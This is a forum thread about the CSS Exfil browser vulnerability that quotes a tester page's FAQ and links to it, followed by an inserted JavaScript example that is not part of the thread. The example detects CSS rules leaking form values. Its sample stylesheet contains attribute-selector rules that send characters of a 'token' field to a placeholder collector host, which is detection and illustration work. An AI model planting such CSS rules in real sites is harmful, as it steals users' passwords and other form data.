CSS Exfil Vulnerability

Discussion in 'privacy problems' started by liba, Feb 6, 2018.

  1. liba (Registered Member)

    Joined: Jan 21, 2016
    Posts: 344

    What is this CSS vulnerability again?
    The CSS Exfil vulnerability detailed in this lengthy post is a method attackers can use to steal data from web pages using Cascading Style Sheets (CSS). CSS - one of the building blocks of the modern web - is used by developers to control the look-and-feel of a website and is present on nearly every modern page on the internet. By crafting targeted CSS selectors and injecting them into a web page, an attacker can trick the page into sending pieces of data to a remote server (e.g. usernames, passwords, and sensitive data such as date of birth, social security numbers, and credit card numbers).

    How does this vulnerability tester page work?
    This page attempts to load four remote images using CSS selectors which parse a hidden text field. If it is able to load any of those four images your browser is vulnerable to the CSS Exfil attack.

    If the vulnerability doesn't involve JavaScript, why does the vulnerability tester require JavaScript?
    While the CSS Exfil attack doesn't require JavaScript to function, this page requires a few lines of JavaScript to check to see if the exploit succeeded in loading the images.

    This page tests to see if your browser is vulnerable to Cascading Style Sheets (CSS) data leakage. If you are vulnerable, one way to protect yourself is to install the CSS Exfil Protection plugin for your browser.

    https://www.mike-gualtieri.com/css-exfil-vulnerability-tester
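
A defensive check for the pattern described in the post above, as an added example that is not part of the original thread and not the code of the tester page or the CSS Exfil Protection plugin: it flags stylesheet rules that pair a value-matching attribute selector with a remote `url()` load. The function name, the sample stylesheet and the `collector.example.invalid` host are constructed for illustration, and the rule splitting is simplified (CSS comments and braces inside quoted strings are not handled).

```javascript
// Added example: audit CSS text for rules that could leak form field contents.
// A rule is flagged when its selector tests an element's value attribute
// ([value=], [value^=], [value$=], [value*=], ...) AND its declarations
// fetch a resource from an absolute or protocol-relative URL.
const VALUE_SELECTOR = /\[\s*value\s*(?:[\^$*~|]?=)[^\]]*\]/i;
const REMOTE_URL = /url\(\s*['"]?\s*((?:https?:)?\/\/[^'")\s]+)/gi;

function findExfilRules(cssText) {
  const findings = [];
  // Simplified rule splitter: "selector { declarations }" with no inner braces.
  const rule = /([^{}]+)\{([^{}]*)\}/g;
  let m;
  while ((m = rule.exec(cssText)) !== null) {
    const selector = m[1].trim();
    const body = m[2];
    if (!VALUE_SELECTOR.test(selector)) continue; // selector ignores value
    const urls = [...body.matchAll(REMOTE_URL)].map((u) => u[1]);
    if (urls.length > 0) findings.push({ selector, urls });
  }
  return findings;
}

// Constructed sample stylesheet: three benign rules, two suspicious ones.
const SAMPLE_CSS = `
  input[type="text"] { border: 1px solid #ccc; }
  .logo { background: url(/static/logo.png); }
  input[name="token"][value^="a"] {
    background-image: url("https://collector.example.invalid/a");
  }
  input[value$='9'] { list-style: url(//collector.example.invalid/9); }
  input[value="on"] { outline: 2px solid green; }
`;

for (const f of findExfilRules(SAMPLE_CSS)) {
  console.log(`suspicious rule: ${f.selector} -> ${f.urls.join(", ")}`);
}
```

Rules that match on `value` but only style the element locally, and rules that load local or same-path images without inspecting `value`, are not reported.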
     
  2. itman (Registered Member)

    Joined: Jun 22, 2010
    Posts: 8,593
    Location: U.S.A.